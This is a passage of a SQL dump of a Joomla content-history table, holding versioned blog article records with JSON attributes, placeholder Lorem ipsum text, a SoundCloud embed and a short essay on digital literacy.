tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:31:13\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:30:47\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"gallery\\\",\\\"gallery\\\":\\\"{\\\\\\\"gallery_images\\\\\\\":[\\\\\\\"images\\\\\\/blog\\\\\\/blog06.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog05.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog04.jpg\\\\\\\"]}\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"3\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(36,75,1,'','2016-02-27 09:31:24',692,4602,'a9c4b8d650e5446fd7e7d4470f29e2bafcf0c4d4','{\"id\":75,\"asset_id\":\"199\",\"title\":\"5 Effective Email Unsubscribe Pages\",\"alias\":\"5-effective-email-unsubscribe-pages\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:31:24\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:31:16\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"audio\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":5,\"ordering\":\"2\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"22\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(37,76,1,'','2016-02-27 09:31:43',692,4127,'e7175c57245c7bc76a1fcc2e5d0a631f0f54d2ea','{\"id\":76,\"asset_id\":\"200\",\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:31:43\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:31:27\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"link\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(38,73,1,'','2016-02-27 09:32:03',692,3052,'3ad377f52b0ef7a35e89b613399e75146fe94e33','{\"id\":73,\"asset_id\":\"197\",\"title\":\"Portable sales devices making a difference.\",\"alias\":\"portable-sales-devices-making-a-difference\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:32:03\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:31:48\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"4\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"96\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(39,75,1,'','2016-02-27 09:32:33',692,4603,'ed4f86affb37b5620a14fd9f3c1e5968a6c8c0cd','{\"id\":75,\"asset_id\":\"199\",\"title\":\"5 Effective Email Unsubscribe Pages.\",\"alias\":\"5-effective-email-unsubscribe-pages\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:32:33\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:32:29\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"audio\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":6,\"ordering\":\"2\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"22\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(40,77,1,'','2016-02-27 09:33:26',692,3905,'6a5cc42bffdde0e10a8c3c79f2bb5e7ae7394b08','{\"id\":77,\"asset_id\":\"201\",\"title\":\"Why we all need to be connected.\",\"alias\":\"why-we-all-need-to-be-connected\",\"introtext\":\"<p>We\\u2019re in a period where the cutting edge of change has moved from the technology to the literacies made possible by the technology.<\\/p>\\r\\n<p>The future of digital culture \\u2013 yours, mine, and ours \\u2013 depends on how well we learn to use the media that have infiltrated, amplified, distracted, enriched, and complicated our lives. I believe that learning to live mindfully in cyber culture is as impor\\u00adtant to us as a civilization as it is vital to you and me as individuals. The mindful use of digital media doesn\\u2019t happen automatically.<\\/p>\\r\\n<p>Thinking about what you are doing and why you are doing it instead of going through the motions is fundamental to the defi\\u00adnition of mindful, whether you are de\\u00adciding to follow someone on Twitter, shutting the lid of your laptop in class, looking up from your BlackBerry in a meeting, or consciously deciding which links not to click. Although edu\\u00adcational institutions have been slow to incorporate digital literacies, practi\\u00adcal know-how is available to those who figure out how to find it. This know-how, from the art of growing social capital in virtual communities to the craft of cultivating wiki collaboration, might determine whether life online will drive us to distraction, or augment and broaden our minds.<\\/p>\\r\\n<p>Those who un\\u00adderstand the fundamentals of digital participation, online collaboration, in\\u00adformational credibility testing, and network awareness will be able to exert more control over their own fates than those who lack this lore.<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:33:26\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:32:43\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball. Tail salami pork loin ham. Drumstick flank porchetta, hamburger ham swine biltong chicken pancetta. Spare ribs prosciutto t-bone.\\\",\\\"quote_author\\\":\\\"- John 